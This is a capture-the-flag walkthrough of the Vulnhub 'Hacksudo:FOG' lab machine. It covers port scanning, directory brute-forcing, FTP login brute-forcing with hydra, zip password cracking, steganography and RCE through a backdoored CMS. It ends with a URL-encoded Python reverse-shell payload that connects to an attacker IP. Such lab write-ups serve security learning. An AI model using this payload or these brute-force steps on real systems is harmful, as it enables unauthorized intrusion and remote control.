Vulnhub Hacksudo:FOG walkthrough

This is a walthrough of another machine “FOG” of the Hacksudo series by Vishal Waghmare. This is really good machine, created by Vishal. If you want to solve it along with me, you can download it from here.

Lots of open ports.Inspect elements helped to show interesting results which helps later. Brute-forcing web directory and page with gobuster shows results which provide cms directory and dict.txt . Text file help to ftp into the box. FTP has file which helps to login to CMS, backdoor in CMS helps to get initial shell. Suid binary to read shadow file. Cracked the password for user then another binary owned by root helps to give root shell.

As we start, use nmap to get the list of open ports run it with -p- option.

Lots of open ports, run Service Detection scan using -sV option of the nmap.Below is the output.

┌──(root💀kali)-[~]
└─# nmap -sV -sC -p21,22,80,111,443,2049,3306,36135,41925,47043,58853 192.168.9.102
Starting Nmap 7.91 ( https://nmap.org ) at 2021–05–18 08:10 UTC
Nmap scan report for 192.168.9.102
Host is up (0.00036s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Pure-FTPd
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 62:ce:1b:7d:4e:24:0f:8a:c1:c9:ea:c4:1e:21:a7:f3 (RSA)
| 256 92:04:5a:0a:86:62:b3:ba:00:f3:82:6a:c9:8d:ae:6d (ECDSA)
|_ 256 74:c5:7c:9f:8d:06:ee:0c:54:5e:65:b2:30:42:98:49 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Hacksudo FOG
111/tcp open rpcbind 2–4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 39119/udp mountd
| 100005 1,2,3 41801/udp6 mountd
| 100005 1,2,3 47043/tcp mountd
| 100005 1,2,3 54785/tcp6 mountd
| 100021 1,3,4 34241/tcp6 nlockmgr
| 100021 1,3,4 34585/udp nlockmgr
| 100021 1,3,4 36135/tcp nlockmgr
| 100021 1,3,4 46924/udp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
443/tcp open ssl/https Apache/2.4.38 (Debian)
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Hacksudo FOG
2049/tcp open nfs_acl 3 (RPC #100227)
3306/tcp open mysql MySQL 5.5.5–10.3.27-MariaDB-0+deb10u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5–10.3.27-MariaDB-0+deb10u1
| Thread ID: 11803
| Capabilities flags: 63486
| Some Capabilities: SupportsCompression, Support41Auth, ConnectWithDatabase, InteractiveClient, FoundRows, Speaks41ProtocolOld, SupportsTransactions, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, Speaks41ProtocolNew, ODBCClient, DontAllowDatabaseTableColumn, LongColumnFlag, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: sx!85B+Q5T)mlVJP4Pw(
|_ Auth Plugin Name: mysql_native_password
36135/tcp open nlockmgr 1–4 (RPC #100021)
41925/tcp open mountd 1–3 (RPC #100005)
47043/tcp open mountd 1–3 (RPC #100005)
58853/tcp open mountd 1–3 (RPC #100005)
MAC Address: 08:00:27:A2:5C:EB (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.77 seconds

I directly jump on port 80 and open it in browser, and it opens a fancy page. To view page source, I used inspect element option in the browser, there is a marquee which gives a link for index1.html.

I clicked on index1.html and navigate to the below page.

Again inspect element and it gives you the first hint. I cloned the SoundStego on my local machine.

Next I run the gobuster with .html,.txt,.php,.zip etc extensions on port 80.I got couple of interesting findings dict.txt and cms directory.

First, I downloaded the dict.txt on my local machine and navigating to /cms shows that it is a CMS made Simple.

I first tried to run SQLi exploit, but it did not work for me.Then I decided to use dict.txt to brute-force FTPand ssh login with users hacksuod and fog.

Used hydra for brute-forcing and found a valid combination for FTP login.

FTP login to the box:

Downloaded the .zip file.

ZIP file required the password.

Used fcrackzip to crack the zip password with rockyou.txt

Unzipped the .zip file and found two files .txt and .wav file.

This is the time to use the SoundStego tool. Successfully retrieved the secret message.

Decoded the message using this site.It has username and password.

If you remember, we have a CMS running used this combination to login into it. This version is vulnerable to RCE. For exploit watch this video. When I was going through the CMS and video observed a .txt file.

Look like we already have a backdoor, just need to copy it and it will get converted to .php backdoor.

Successful RCE.

Started the netcat listener on kali and used below payload with IP of attacker machine in place of IP address.

python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%2212.18.9.91%22%2C4242))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3Bos.dup2(s.fileno()%2C2)%3Bimport%20pty%3B%20pty.spawn(%22%2Fbin%2Fbash%22)%27

Got the reverse shell.